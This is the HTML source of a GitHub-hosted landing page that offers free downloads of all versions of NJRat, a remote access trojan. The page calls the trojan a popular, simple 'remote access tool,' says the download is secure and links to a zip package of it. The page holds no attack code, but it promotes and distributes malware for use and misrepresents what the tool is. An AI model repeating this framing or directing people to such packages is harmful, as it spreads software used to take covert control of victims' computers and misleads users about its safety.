-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
105 lines (99 loc) · 3.33 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
<!DOCTYPE html>
<html lang="en">
<link rel="icon" type="image/x-icon" href="https://raw.githubusercontent.com/charlie-60/charlie-60.github.io/refs/heads/main/NJRAT.ico">
<meta property="og:title" content="NJRAT">
<meta property="og:description" content="Official website to download all version njrat">
<meta property="og:image" content="https://i.ibb.co/K5pWVnj/NJRAT.png">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="1200">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>All NJRat Versions</title>
<style>
body {
background-color: #000;
color: #0f0;
font-family: "Courier New", Courier, monospace;
margin: 0;
padding: 0;
}
header {
text-align: center;
padding: 20px;
border-bottom: 2px solid #0f0;
}
header h1 {
font-size: 3rem;
margin: 0;
}
header p {
font-size: 1.2rem;
margin-top: 10px;
}
main {
padding: 20px;
text-align: center;
}
main p {
font-size: 1.2rem;
line-height: 1.8;
margin: 20px 0;
}
.download-btn {
display: inline-block;
padding: 15px 30px;
font-size: 1.2rem;
font-weight: bold;
color: #000;
background-color: #0f0;
border: none;
border-radius: 5px;
text-decoration: none;
cursor: pointer;
transition: 0.3s;
}
.download-btn:hover {
background-color: #090;
transform: scale(1.1);
}
footer {
text-align: center;
padding: 10px;
margin-top: 20px;
border-top: 2px solid #0f0;
font-size: 0.9rem;
}
footer a {
color: #0f0;
text-decoration: none;
}
footer a:hover {
text-decoration: underline;
}
</style>
</head>
<body>
<header>
<h1>All NJRat Versions</h1>
<p>The best place to download all NJRat versions, old and new, for free and securely.</p>
</header>
<main>
<p>
Welcome to our website where we provide all versions of NJRat, the most popular remote access tool.
It is known for its simplicity and fast connection capabilities.
<br>
Download now all versions in one updated and complete package.
</p>
<p>
If you're looking for a powerful tool to experience remote access, this collection offers everything you need.
We make sure to provide both old and new versions to satisfy all users.
</p>
<a href="https://github.com/charlie-60/NJRAT-ALL/archive/refs/heads/main.zip" class="download-btn">Download the Package Now</a>
</main>
<footer>
<p>© 2014 - 2019 All rights reserved | Designed with hacker vibes</p>
<p>For more information, contact us via <a href="njrat@hotmail.com">email</a>.</p>
</footer>
</body>
</html>